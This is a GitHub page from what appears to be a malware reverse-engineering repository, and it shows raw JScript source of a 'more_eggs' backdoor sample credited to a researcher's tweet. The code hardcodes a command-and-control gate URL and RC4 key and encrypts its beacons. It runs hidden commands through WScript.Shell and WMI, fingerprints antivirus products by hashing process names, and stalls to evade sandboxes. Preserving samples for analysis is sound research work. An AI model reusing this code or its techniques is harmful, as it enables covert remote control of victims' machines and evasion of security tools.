Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Malware-Misc-RE/2020-07-25-more-eggs-vk.raw.js /
Jump to
Code definitions
anonymous Function obj Function check_Net Function onreadystatechange Function cLength Function rInt Function rStr Function fuck_js Function fexist Function rexist Function myEnv Function myBits Function zzzz4 Function zzz4Bytes Function tB Function tS Function mZcheck Function tempExtra Function randomTmp Function tempNow Function dFile Function sFolder Function base91_encode Function base91_decode Function base64_encode Function cmd_command Function wmi_command Function waitfor Function wmi_waitfor Function waitfor2 Function wmi_waitfor2 Function remove_non_ascii Function check_Host Function onreadystatechange Function crc32_init Function b_crc32 Function cAV Function ascii_to_hex Function os_hwid_install_date Function os_version_no_cmd Function local_ip2 Function os_product_no_wmi Function bot_header Function hit_Gate Function onreadystatechange Function dExec Function onreadystatechange Function rev_cmd Function eTask Function main Function go Function check_inside Function sys Function
Code navigation index up-to-date

Go to file
  • Go to file
  • Copy path
  • Copy permalink
 
 
Cannot retrieve contributors at this time
2306 lines (2256 sloc) 70.5 KB
Raw Blame
Open in GitHub Desktop
///////////////////////////////////////////////////////////////////////////////////////
////////////////////////// more_eggs sample ///////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
/////// source: https://twitter.com/VK_Intel/status/1286747453849468929 ///////////////
///////////////////////////////////////////////////////////////////////////////////////
function anonymous() {
var BV = "6.6a";
var Gate = "https://maps.doaglas.com/update/check";
var hit_each = 10;
var error_retry = 2;
var restart_h = 4;
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
var Rkey = "whVbBSXoQHLa9sfFVZ";
var rcon_now = 0;
var gtfo = false;
var selfdel = false;
var table = [];
var Build = "";
var PCN = "";
var UNM = "";
var SYSTEM = 0;
var rootK = "HKCU";
var workingDir = "";
var main_mitm = "";
var xApp = "";
var xTmp = "";
var PreserveH = "";
var xStore = "";
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"';
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function obj(xString) {
return new ActiveXObject(xString);
}
var con;
try {
con = obj("Msxml2.XMLHTTP.6.0");
} catch (e) {
try {
con = obj("Msxml2.XMLHTTP.3.0");
} catch (e2) {
con = obj("Microsoft.XMLHTTP");
}
}
var xhr;
try {
xhr = obj("Msxml2.ServerXMLHTTP.6.0");
} catch (e3) {
xhr = obj("Msxml2.ServerXMLHTTP.3.0");
}
function check_Net(method) {
var Resp = false;
var conz1;
var t11 = "";
if (method === 1) {
conz1 = xhr;
} else {
conz1 = con;
}
try {
conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false);
} catch (e1) {
if (method === 0) {
return check_Net(1);
} else {
return false;
}
}
conz1.onreadystatechange = function() {
if (conz1.readyState === 4) {
if (conz1.status === 200) {
t11 = conz1.responseText;
if (t11) {
if (t11 == 'This is another XSL namespace\n') {
Resp = true;
} else {
Resp = false;
}
} else {
Resp = false;
}
} else {
Resp = false;
}
}
};
try {
conz1.send();
} catch (e2) {
if (method === 0) {
return check_Net(1);
} else {
return false;
}
}
return Resp;
}
function cLength(mstr, min, max) {
var n = mstr.length;
if (n === 0) {
return false;
}
if (n >= min && (n <= max)) {
return true;
}
}
function rInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function rStr(len) {
var xRnd = "";
var i;
var randomPoz;
var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
var clen = 62;
i = 0;
do {
randomPoz = Math.floor(Math.random() * clen);
xRnd += charSet.substring(randomPoz, randomPoz + 1);
i += 1;
} while (i < len);
return xRnd;
}
function fuck_js() {
var xNow = rInt(2, 16);
var rNow = rStr(xNow);
try {
xhr.setTimeouts(5000, 5000, 10000, 10000);
xhr.open("GET", "http://8.8.8.8/" + rNow, false);
xhr.send();
} catch (e9) {
return false;
}
}
function fexist(xpath) {
var fso;
try {
fso = obj("Scripting.FileSystemObject");
if (fso.FileExists(xpath)) {
return true;
} else {
return false;
}
} catch (feer) {
return false;
}
}
function rexist(xpath) {
var sh;
var rdata;
try {
sh = obj("Wscript.shell");
rdata = sh.RegRead(xpath);
if (rdata !== null) {
return true;
}
} catch (e71) {
return false;
}
}
function myEnv(xVar, xSystem) {
var a1;
var rEnv;
a1 = obj("WScript.Shell");
if (xSystem === 1) {
rEnv = a1.environment("SYSTEM");
} else {
rEnv = a1.environment("PROCESS");
}
return rEnv(xVar);
}
function myBits() {
var xBits;
xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
if (xBits === "AMD64") {
return "64";
} else {
return "86";
}
}
function zzzz4(key, str) {
var s = [];
var j = 0;
var x;
var res = "";
var i;
var y;
if (key && str) {
i = 0;
do {
s[i] = i;
i += 1;
} while (i < 256);
i = 0;
do {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
i += 1;
} while (i < 256);
i = 0;
j = 0;
y = 0;
do {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
y += 1;
} while (y < str.length);
}
return res;
}
function zzz4Bytes(xArray, key) {
var s = [];
var j = 0;
var x;
var outBytes = [];
var i;
var y;
if (key && xArray) {
i = 0;
do {
s[i] = i;
i += 1;
} while (i < 256);
i = 0;
do {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
i += 1;
} while (i < 256);
i = 0;
j = 0;
y = 0;
do {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]);
y += 1;
} while (y < xArray.length);
}
return outBytes;
}
function tB(htc) {
var y = [];
y[0xC7] = 0x80;
y[0xFC] = 0x81;
y[0xE9] = 0x82;
y[0xE2] = 0x83;
y[0xE4] = 0x84;
y[0xE0] = 0x85;
y[0xE5] = 0x86;
y[0xE7] = 0x87;
y[0xEA] = 0x88;
y[0xEB] = 0x89;
y[0xE8] = 0x8A;
y[0xEF] = 0x8B;
y[0xEE] = 0x8C;
y[0xEC] = 0x8D;
y[0xC4] = 0x8E;
y[0xC5] = 0x8F;
y[0xC9] = 0x90;
y[0xE6] = 0x91;
y[0xC6] = 0x92;
y[0xF4] = 0x93;
y[0xF6] = 0x94;
y[0xF2] = 0x95;
y[0xFB] = 0x96;
y[0xF9] = 0x97;
y[0xFF] = 0x98;
y[0xD6] = 0x99;
y[0xDC] = 0x9A;
y[0xA2] = 0x9B;
y[0xA3] = 0x9C;
y[0xA5] = 0x9D;
y[0x20A7] = 0x9E;
y[0x192] = 0x9F;
y[0xE1] = 0xA0;
y[0xED] = 0xA1;
y[0xF3] = 0xA2;
y[0xFA] = 0xA3;
y[0xF1] = 0xA4;
y[0xD1] = 0xA5;
y[0xAA] = 0xA6;
y[0xBA] = 0xA7;
y[0xBF] = 0xA8;
y[0x2310] = 0xA9;
y[0xAC] = 0xAA;
y[0xBD] = 0xAB;
y[0xBC] = 0xAC;
y[0xA1] = 0xAD;
y[0xAB] = 0xAE;
y[0xBB] = 0xAF;
y[0x2591] = 0xB0;
y[0x2592] = 0xB1;
y[0x2593] = 0xB2;
y[0x2502] = 0xB3;
y[0x2524] = 0xB4;
y[0x2561] = 0xB5;
y[0x2562] = 0xB6;
y[0x2556] = 0xB7;
y[0x2555] = 0xB8;
y[0x2563] = 0xB9;
y[0x2551] = 0xBA;
y[0x2557] = 0xBB;
y[0x255D] = 0xBC;
y[0x255C] = 0xBD;
y[0x255B] = 0xBE;
y[0x2510] = 0xBF;
y[0x2514] = 0xC0;
y[0x2534] = 0xC1;
y[0x252C] = 0xC2;
y[0x251C] = 0xC3;
y[0x2500] = 0xC4;
y[0x253C] = 0xC5;
y[0x255E] = 0xC6;
y[0x255F] = 0xC7;
y[0x255A] = 0xC8;
y[0x2554] = 0xC9;
y[0x2569] = 0xCA;
y[0x2566] = 0xCB;
y[0x2560] = 0xCC;
y[0x2550] = 0xCD;
y[0x256C] = 0xCE;
y[0x2567] = 0xCF;
y[0x2568] = 0xD0;
y[0x2564] = 0xD1;
y[0x2565] = 0xD2;
y[0x2559] = 0xD3;
y[0x2558] = 0xD4;
y[0x2552] = 0xD5;
y[0x2553] = 0xD6;
y[0x256B] = 0xD7;
y[0x256A] = 0xD8;
y[0x2518] = 0xD9;
y[0x250C] = 0xDA;
y[0x2588] = 0xDB;
y[0x2584] = 0xDC;
y[0x258C] = 0xDD;
y[0x2590] = 0xDE;
y[0x2580] = 0xDF;
y[0x3B1] = 0xE0;
y[0xDF] = 0xE1;
y[0x393] = 0xE2;
y[0x3C0] = 0xE3;
y[0x3A3] = 0xE4;
y[0x3C3] = 0xE5;
y[0xB5] = 0xE6;
y[0x3C4] = 0xE7;
y[0x3A6] = 0xE8;
y[0x398] = 0xE9;
y[0x3A9] = 0xEA;
y[0x3B4] = 0xEB;
y[0x221E] = 0xEC;
y[0x3C6] = 0xED;
y[0x3B5] = 0xEE;
y[0x2229] = 0xEF;
y[0x2261] = 0xF0;
y[0xB1] = 0xF1;
y[0x2265] = 0xF2;
y[0x2264] = 0xF3;
y[0x2320] = 0xF4;
y[0x2321] = 0xF5;
y[0xF7] = 0xF6;
y[0x2248] = 0xF7;
y[0xB0] = 0xF8;
y[0x2219] = 0xF9;
y[0xB7] = 0xFA;
y[0x221A] = 0xFB;
y[0x207F] = 0xFC;
y[0xB2] = 0xFD;
y[0x25A0] = 0xFE;
y[0xA0] = 0xFF;
var ami = [];
var mi;
var renderer;
var atends;
mi = 0;
do {
renderer = htc.charCodeAt(mi);
if (renderer < 128) {
atends = renderer;
} else {
atends = y[renderer];
}
ami.push(atends);
mi += 1;
} while (mi < htc.length);
return ami;
}
function tS(arenderer) {
var x = [];
x[0x80] = 0x00C7;
x[0x81] = 0x00FC;
x[0x82] = 0x00E9;
x[0x83] = 0x00E2;
x[0x84] = 0x00E4;
x[0x85] = 0x00E0;
x[0x86] = 0x00E5;
x[0x87] = 0x00E7;
x[0x88] = 0x00EA;
x[0x89] = 0x00EB;
x[0x8A] = 0x00E8;
x[0x8B] = 0x00EF;
x[0x8C] = 0x00EE;
x[0x8D] = 0x00EC;
x[0x8E] = 0x00C4;
x[0x8F] = 0x00C5;
x[0x90] = 0x00C9;
x[0x91] = 0x00E6;
x[0x92] = 0x00C6;
x[0x93] = 0x00F4;
x[0x94] = 0x00F6;
x[0x95] = 0x00F2;
x[0x96] = 0x00FB;
x[0x97] = 0x00F9;
x[0x98] = 0x00FF;
x[0x99] = 0x00D6;
x[0x9A] = 0x00DC;
x[0x9B] = 0x00A2;
x[0x9C] = 0x00A3;
x[0x9D] = 0x00A5;
x[0x9E] = 0x20A7;
x[0x9F] = 0x0192;
x[0xA0] = 0x00E1;
x[0xA1] = 0x00ED;
x[0xA2] = 0x00F3;
x[0xA3] = 0x00FA;
x[0xA4] = 0x00F1;
x[0xA5] = 0x00D1;
x[0xA6] = 0x00AA;
x[0xA7] = 0x00BA;
x[0xA8] = 0x00BF;
x[0xA9] = 0x2310;
x[0xAA] = 0x00AC;
x[0xAB] = 0x00BD;
x[0xAC] = 0x00BC;
x[0xAD] = 0x00A1;
x[0xAE] = 0x00AB;
x[0xAF] = 0x00BB;
x[0xB0] = 0x2591;
x[0xB1] = 0x2592;
x[0xB2] = 0x2593;
x[0xB3] = 0x2502;
x[0xB4] = 0x2524;
x[0xB5] = 0x2561;
x[0xB6] = 0x2562;
x[0xB7] = 0x2556;
x[0xB8] = 0x2555;
x[0xB9] = 0x2563;
x[0xBA] = 0x2551;
x[0xBB] = 0x2557;
x[0xBC] = 0x255D;
x[0xBD] = 0x255C;
x[0xBE] = 0x255B;
x[0xBF] = 0x2510;
x[0xC0] = 0x2514;
x[0xC1] = 0x2534;
x[0xC2] = 0x252C;
x[0xC3] = 0x251C;
x[0xC4] = 0x2500;
x[0xC5] = 0x253C;
x[0xC6] = 0x255E;
x[0xC7] = 0x255F;
x[0xC8] = 0x255A;
x[0xC9] = 0x2554;
x[0xCA] = 0x2569;
x[0xCB] = 0x2566;
x[0xCC] = 0x2560;
x[0xCD] = 0x2550;
x[0xCE] = 0x256C;
x[0xCF] = 0x2567;
x[0xD0] = 0x2568;
x[0xD1] = 0x2564;
x[0xD2] = 0x2565;
x[0xD3] = 0x2559;
x[0xD4] = 0x2558;
x[0xD5] = 0x2552;
x[0xD6] = 0x2553;
x[0xD7] = 0x256B;
x[0xD8] = 0x256A;
x[0xD9] = 0x2518;
x[0xDA] = 0x250C;
x[0xDB] = 0x2588;
x[0xDC] = 0x2584;
x[0xDD] = 0x258C;
x[0xDE] = 0x2590;
x[0xDF] = 0x2580;
x[0xE0] = 0x03B1;
x[0xE1] = 0x00DF;
x[0xE2] = 0x0393;
x[0xE3] = 0x03C0;
x[0xE4] = 0x03A3;
x[0xE5] = 0x03C3;
x[0xE6] = 0x00B5;
x[0xE7] = 0x03C4;
x[0xE8] = 0x03A6;
x[0xE9] = 0x0398;
x[0xEA] = 0x03A9;
x[0xEB] = 0x03B4;
x[0xEC] = 0x221E;
x[0xED] = 0x03C6;
x[0xEE] = 0x03B5;
x[0xEF] = 0x2229;
x[0xF0] = 0x2261;
x[0xF1] = 0x00B1;
x[0xF2] = 0x2265;
x[0xF3] = 0x2264;
x[0xF4] = 0x2320;
x[0xF5] = 0x2321;
x[0xF6] = 0x00F7;
x[0xF7] = 0x2248;
x[0xF8] = 0x00B0;
x[0xF9] = 0x2219;
x[0xFA] = 0x00B7;
x[0xFB] = 0x221A;
x[0xFC] = 0x207F;
x[0xFD] = 0x00B2;
x[0xFE] = 0x25A0;
x[0xFF] = 0x00A0;
var bb = [];
var leppek = "";
var atends;
var renderer;
var mi;
mi = 0;
do {
atends = arenderer[mi];
if (atends < 128) {
renderer = atends;
} else {
renderer = x[atends];
}
bb.push(String.fromCharCode(renderer));
mi += 1;
} while (mi < arenderer.length);
leppek = bb.join("");
return leppek;
}
function mZcheck(arenderer) {
if (arenderer[0] === 0x4D && arenderer[1] === 0x5a) {
return true;
} else {
return false;
}
}
function tempExtra() {
return Math.floor(Math.random() * 65536);
}
function randomTmp() {
var fso2;
var t1;
var xelse = "22222222.txt";
try {
fso2 = obj("Scripting.FileSystemObject");
t1 = fso2.GetTempName();
if (t1) {
return t1;
} else {
return xelse;
}
} catch (e0) {
return xelse;
}
}
function tempNow() {
var xout = tempExtra();
if (!xout) {
xout = randomTmp();
} else {
xout += ".txt";
}
return xout;
}
function dFile(filespec) {
var fso;
try {
fso = obj("Scripting.FileSystemObject");
if (fso.FileExists(filespec)) {
fso.DeleteFile(filespec);
}
} catch (e8) {
return false;
}
}
function sFolder(CSIDL) {
var objFolder;
try {
var app = obj("Shell.Application");
objFolder = app.NameSpace(CSIDL);
if (objFolder !== null) {
var objFolderItem;
objFolderItem = objFolder.Self;
if (objFolderItem !== null) {
return objFolderItem.Path;
} else {
return false;
}
} else {
return false;
}
} catch (e1z0) {
return false;
}
}
function base91_encode(data) {
if (data) {
var len = data.length;
var ret = "";
var n = 0;
var b = 0;
var v = 0;
var i = 0;
do {
b = b | data.charCodeAt(i) << n;
n = n + 8;
if (n > 13) {
v = b & 8191;
if (v > 88) {
b = b >> 13;
n = n - 13;
} else {
v = b & 16383;
b = b >> 14;
n = n - 14;
}
ret += set.charAt(v % 91) + set.charAt(v / 91 | 0);
}
i = i + 1;
} while (i < len);
if (n) {
ret += set.charAt(b % 91);
if (n > 7 || b > 90) {
ret += set.charAt(b / 91 | 0);
}
}
return ret;
}
}
function base91_decode(data) {
if (data) {
var len = data.length;
var ret = "";
var b = 0;
var n = 0;
var v = -1;
var p;
var i = 0;
do {
p = set.indexOf(data.charAt(i));
if (p !== -1) {
if (v < 0) {
v = p;
} else {
v = v + p * 91;
b = b | v << n;
if ((v & 8191) > 88) {
n = n + 13;
} else {
n = n + 14;
}
do {
ret += String.fromCharCode(b & 0xff);
b = b >> 8;
n = n - 8;
} while (n > 7);
v = -1;
}
}
i = i + 1;
} while (i < len);
if (v > -1) {
ret += String.fromCharCode((b | v << n) & 0xff);
}
return (ret);
}
}
function base64_encode(data) {
if (data) {
var result = '';
var i = 0;
var b1;
var b2;
var b3;
var b4;
var n = data.length;
var a;
var b;
var c;
do {
a = data.charCodeAt(i++);
b = data.charCodeAt(i++);
c = data.charCodeAt(i++);
a = a ? a : 0;
b = b ? b : 0;
c = c ? c : 0;
b1 = (a >> 2) & 0x3F;
b2 = ((a & 0x3) << 4) | ((b >> 4) & 0xF);
b3 = ((b & 0xF) << 2) | ((c >> 6) & 0x3);
b4 = c & 0x3F;
if (!b) {
b3 = 64;
b4 = 64;
} else if (!c) {
b4 = 64;
}
result = result + b64.charAt(b1) + b64.charAt(b2) + b64.charAt(b3) + b64.charAt(b4);
b1 = 0;
b2 = 0;
b3 = 0;
b4 = 0;
a = 0;
b = 0;
c = 0;
} while (i < n);
return result;
}
}
function cmd_command(sCom, wait1) {
var oShell;
var w11;
try {
oShell = obj("Wscript.Shell");
if (wait1 == 1) {
w11 = 1;
} else {
w11 = 0;
}
if (!w11) {
w11 = 0;
}
oShell.Run(sCom, 0, w11);
return true;
} catch (ec1) {
return false;
}
}
function wmi_command(sCom, wait) {
try {
var loc = obj("WbemScripting.SWbemLocator");
var svc = loc.ConnectServer(".", "root\\cimv2");
var objStartup = svc.Get("Win32_ProcessStartup").SpawnInstance_();
objStartup.ShowWindow = 0;
var objProcess = svc.Get("Win32_Process");
var objInParam = objProcess.Methods_("Create").inParameters.SpawnInstance_();
objInParam.Properties_.Item("CommandLine").Value = sCom;
objInParam.Properties_.Item("ProcessStartupInformation").Value = objStartup;
var objOutParams = svc.ExecMethod("Win32_Process", "Create", objInParam);
if (objOutParams.ReturnValue !== 0) {
return cmd_command(sCom, wait);
}
if (wait == 1) {
var cPid = objOutParams.ProcessId;
var eventObj;
var eventSrc = svc.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process'");
while (true) {
eventObj = eventSrc.nextEvent();
if (eventObj.TargetInstance.ProcessID == cPid) {
break;
}
}
}
return true;
} catch (ec1) {
return cmd_command(sCom, wait);
}
}
function waitfor(sMinutes) {
var limit = Date.parse(Date()) + (sMinutes * 60000);
while (Date.parse(Date()) < limit) {
fuck_js();
}
main();
}
function wmi_waitfor(sMinutes) {
var ret88;
if (!sMinutes) {
return false;
}
var seconds = sMinutes * 60;
var sec2 = seconds.toString();
try {
ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
if (ret88 == true) {
main();
} else {
waitfor(sMinutes);
}
} catch (ewmi) {
return waitfor(sMinutes);
}
}
function waitfor2(sMinutes, iGo) {
var xlmt;
xlmt = Date.parse(Date()) + (sMinutes * 60000);
while (Date.parse(Date()) < xlmt) {
fuck_js();
}
if (iGo === 1) {
go();
}
}
function wmi_waitfor2(sMinutes, iGo) {
var ret88;
if (!sMinutes) {
return false;
}
var seconds = sMinutes * 60;
var sec2 = seconds.toString();
try {
ret88 = wmi_command('typeperf.exe "\\System\\Processor Queue Length" -si ' + sec2 + ' -sc 1', 1);
if (ret88 == true) {
if (iGo === 1) {
go();
}
} else {
waitfor2(sMinutes, iGo);
}
} catch (ewmi) {
return waitfor2(sMinutes, iGo);
}
}
function remove_non_ascii(str) {
var ret1 = "";
if ((!str) || (str === '')) {
return "0";
} else {
try {
str = str.toString();
ret1 = str.replace(/[^\x20-\x7E]/g, '');
} catch (un1) {
return "0";
}
}
if (!ret1) {
return "0";
} else {
return ret1;
}
}
function check_Host(method) {
var Resp = false;
var Temp90 = "";
var g11 = 0;
var conz1;
if (SYSTEM === 1) {
conz1 = xhr;
} else {
if (method === 1) {
conz1 = xhr;
} else {
conz1 = con;
}
}
try {
conz1.open("POST", Gate, false);
} catch (e3) {
if (SYSTEM === 0 && method === 0) {
return check_Host(1);
} else {
return false;
}
}
conz1.onreadystatechange = function() {
if (conz1.readyState === 4) {
if (conz1.status === 200) {
Temp90 = conz1.responseText;
if (Temp90) {
if (cLength(Temp90, 8, 32) === true) {
Resp = true;
}
}
}
}
};
var keynow = rStr(2);
var rNow = rInt(8, 32);
var not_unique = "|" + rStr(rNow) + "|";
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
var encoded = base91_encode(xCrypted);
if (SYSTEM === 1 || method === 1) {
try {
conz1.setOption(2, 13056);
} catch (e411) {
g11 = 1;
}
}
try {
conz1.send(encoded);
} catch (e4) {
if (SYSTEM === 0 && method === 0) {
return check_Host(1);
} else {
return false;
}
}
return Resp;
}
function crc32_init() {
var i = 0;
var tmp = 0;
var k = 0;
while (i < 256) {
tmp = i;
k = 0;
while (k < 8) {
tmp = tmp & 1 ? 3988292384 ^ tmp >>> 1 : tmp >>> 1;
k += 1;
}
table[i] = tmp;
i += 1;
}
}
function b_crc32(str) {
var crc = -1;
var iTop = str.length;
var i = 0;
while (i < iTop) {
crc = (crc >>> 8) ^ table[(crc ^ str.charCodeAt(i)) & 0xFF];
i += 1;
}
return (crc ^ (-1)) >>> 0;
}
function cAV() {
var pList = [];
var i = 0;
var rAV = "";
var ExeNow = "";
var fso;
var file4;
var vStr = "";
var tList = [];
var tL2 = [];
var rExe = "";
var x;
var pNow = "";
var cNow = 0;
var rFile = "";
var wInternal;
var itemNow;
var v1 = "a";
var v2 = "b";
var v3 = "c";
var v4 = "d";
var v5 = "e";
var v6 = "f";
var v7 = "g";
var v8 = "h";
var v9 = "i";
var v10 = "j";
var v11 = "k";
var v12 = "l";
var v13 = "m";
var v14 = "n";
var v15 = "o";
var v16 = "p";
var v17 = "q";
var v18 = "r";
var v19 = "s";
var v20 = "t";
var v21 = "u";
var v22 = "v";
var v23 = "w";
var v24 = "x";
var v25 = "y";
var v26 = "z";
var v27 = "1";
var v28 = "2";
var v29 = "3";
var v30 = "4";
var v31 = "5";
var ret7;
try {
var loc = obj("WbemScripting.SWbemLocator");
var svc = loc.ConnectServer(".", "root\\cimv2");
var coll = svc.ExecQuery("SELECT * FROM Win32_Process");
var items = new Enumerator(coll);
while (items.atEnd() === false) {
itemNow = items.item();
if (itemNow) {
ExeNow = itemNow.Name;
tList.push(ExeNow);
}
items.moveNext();
}
ExeNow = "";
wInternal = 1;
} catch (ave1) {
rFile = xTmp + tempNow();
var r1 = rStr(rInt(4, 8));
ret7 = wmi_command('cmd /v /c set "' + r1 + '=s" && ta!' + r1 + '!kli!' + r1 + '!t /NH /FO C!' + r1 + '!V > "' + rFile + '"', 1);
if (ret7 == false) {
dFile(rFile);
return "0";
}
wInternal = 0;
}
if (wInternal == 0) {
try {
if (fexist(rFile) === true) {
fso = obj("Scripting.FileSystemObject");
file4 = fso.OpenTextFile(rFile, 1, 0);
if (file4.AtEndOfStream === false) {
vStr = file4.ReadAll();
}
file4.Close();
dFile(rFile);
} else {
return "0";
}
} catch (eav1) {
return "0";
}
try {
if (vStr) {
tList = vStr.split(/\r?\n/);
} else {
return "0";
}
} catch (eav3) {
return "0";
}
}
try {
if (tList.length <= 5) {
return "0";
}
crc32_init();
i = 0;
do {
if (wInternal == 1) {
rExe = tList[i];
} else {
ExeNow = tList[i];
tL2 = ExeNow.split('"');
rExe = tL2[1];
}
if ((rExe) && (rExe.length >= 4)) {
cNow = b_crc32(rExe.toLowerCase());
if (cNow && cNow !== 3377271179 && cNow !== 3106260013 && cNow !== 902868994 && cNow !== 74504709 && cNow !== 3187896405 && cNow !== 1036299297 && cNow !== 2619149582 && cNow !== 3034799888 && cNow !== 3286091477 && cNow !== 1025985939 && cNow !== 437725275 && cNow !== 3520973717 && cNow !== 81053313 && cNow !== 3027707000 && cNow !== 1251423904 && cNow !== 3867582538 && cNow !== 961692650 && cNow !== 1073290778 && cNow !== 3024872867 && cNow !== 1105170146 && cNow !== 333580186 && cNow !== 2027685132 && cNow !== 4097471352) {
pList.push(cNow);
}
}
rExe = "";
i += 1;
} while (i < tList.length);
tList = [];
tL2 = [];
} catch (eav3) {
return "0";
}
if (pList.length >= 5) {
cNow = 0;
x = 0;
do {
pNow = pList[x];
switch (pNow) {
case 4167611121:
if (rAV.indexOf(v1) === -1) {
rAV += v1 + ",";
}
break;
case 877060326:
if (rAV.indexOf(v1) === -1) {
rAV += v1 + ",";
}
break;
case 305523985:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 800732934:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 1964687411:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 2528998123:
if (rAV.indexOf(v2) === -1) {
rAV += v2 + ",";
}
break;
case 536747592:
if (rAV.indexOf(v4) === -1) {
rAV += v4 + ",";
}
break;
case 184741780:
if (rAV.indexOf(v4) === -1) {
rAV += v4 + ",";
}
break;
case 242152363:
if (rAV.indexOf(v5) === -1) {
rAV += v5 + ",";
}
break;
case 3038770874:
if (rAV.indexOf(v6) === -1) {
rAV += v6 + ",";
}
break;
case 1863628361:
if (rAV.indexOf(v6) === -1) {
rAV += v6 + ",";
}
break;
case 1779566114:
if (rAV.indexOf(v6) === -1) {
rAV += v6 + ",";
}
break;
case 19515369:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 2229870333:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 4056687588:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 1081013580:
if (rAV.indexOf(v7) === -1) {
rAV += v7 + ",";
}
break;
case 238643926:
if (rAV.indexOf(v8) === -1) {
rAV += v8 + ",";
}
break;
case 3103805340:
if (rAV.indexOf(v8) === -1) {
rAV += v8 + ",";
}
break;
case 3898904431:
if (rAV.indexOf(v9) === -1) {
rAV += v9 + ",";
}
break;
case 2447720335:
if (rAV.indexOf(v9) === -1) {
rAV += v9 + ",";
}
break;
case 1474450799:
if (rAV.indexOf(v9) === -1) {
rAV += v9 + ",";
}
break;
case 1087054291:
if (rAV.indexOf(v10) === -1) {
rAV += v10 + ",";
}
break;
case 3237881663:
if (rAV.indexOf(v11) === -1) {
rAV += v11 + ",";
}
break;
case 2928704260:
if (rAV.indexOf(v12) === -1) {
rAV += v12 + ",";
}
break;
case 3457522114:
if (rAV.indexOf(v13) === -1) {
rAV += v13 + ",";
}
break;
case 1864254150:
if (rAV.indexOf(v13) === -1) {
rAV += v13 + ",";
}
break;
case 2866464079:
if (rAV.indexOf(v13) === -1) {
rAV += v13 + ",";
}
break;
case 3233790880:
if (rAV.indexOf(v14) === -1) {
rAV += v14 + ",";
}
break;
case 3314468719:
if (rAV.indexOf(v15) === -1) {
rAV += v15 + ",";
}
break;
case 2432672291:
if (rAV.indexOf(v16) === -1) {
rAV += v16 + ",";
}
break;
case 332293705:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 3917603449:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 3707949399:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 61053860:
if (rAV.indexOf(v17) === -1) {
rAV += v17 + ",";
}
break;
case 1570161171:
if (rAV.indexOf(v18) === -1) {
rAV += v18 + ",";
}
break;
case 1146093233:
if (rAV.indexOf(v19) === -1) {
rAV += v19 + ",";
}
break;
case 3758109384:
if (rAV.indexOf(v20) === -1) {
rAV += v20 + ",";
}
break;
case 3601606648:
if (rAV.indexOf(v21) === -1) {
rAV += v21 + ",";
}
break;
case 2544592543:
if (rAV.indexOf(v22) === -1) {
rAV += v22 + ",";
}
break;
case 2514406649:
if (rAV.indexOf(v23) === -1) {
rAV += v23 + ",";
}
break;
case 807313958:
if (rAV.indexOf(v24) === -1) {
rAV += v24 + ",";
}
break;
case 2213386403:
if (rAV.indexOf(v25) === -1) {
rAV += v25 + ",";
}
break;
case 2880445231:
if (rAV.indexOf(v26) === -1) {
rAV += v26 + ",";
}
break;
case 2394653102:
if (rAV.indexOf(v27) === -1) {
rAV += v27 + ",";
}
break;
case 1164644511:
if (rAV.indexOf(v3) === -1) {
rAV += v3 + ",";
}
break;
case 1683252343:
if (rAV.indexOf(v28) === -1) {
rAV += v28 + ",";
}
break;
case 1460978182:
if (rAV.indexOf(v29) === -1) {
rAV += v29 + ",";
}
break;
case 3576979024:
if (rAV.indexOf(v30) === -1) {
rAV += v30 + ",";
}
break;
case 3540381638:
if (rAV.indexOf(v31) === -1) {
rAV += v31 + ",";
}
break;
case 4028018370:
if (rAV.indexOf(v31) === -1) {
rAV += v31 + ",";
}
break;
}
x += 1;
} while (x < pList.length);
if (rAV.length >= 1) {
if (rAV.substring(rAV.length - 1) === ",") {
rAV = rAV.substring(0, rAV.length - 1);
}
} else {
rAV = "0";
}
} else {
rAV = "0";
}
pList = [];
if (rAV) {
return rAV;
} else {
return "0";
}
}
function ascii_to_hex(str) {
var arr1 = [];
var hex1;
var str1;
if (!str) {
return "0";
}
try {
str1 = str.toString();
var n = 0;
var count1 = str1.length;
do {
hex1 = Number(str1.charCodeAt(n)).toString(16);
arr1.push(hex1);
n = n + 1;
} while (n < count1);
return arr1.join('');
} catch (e93) {
try {
str1 = str.toString();
} catch (e93) {
str1 = str;
}
if (str1) {
return str1;
} else {
return str;
}
}
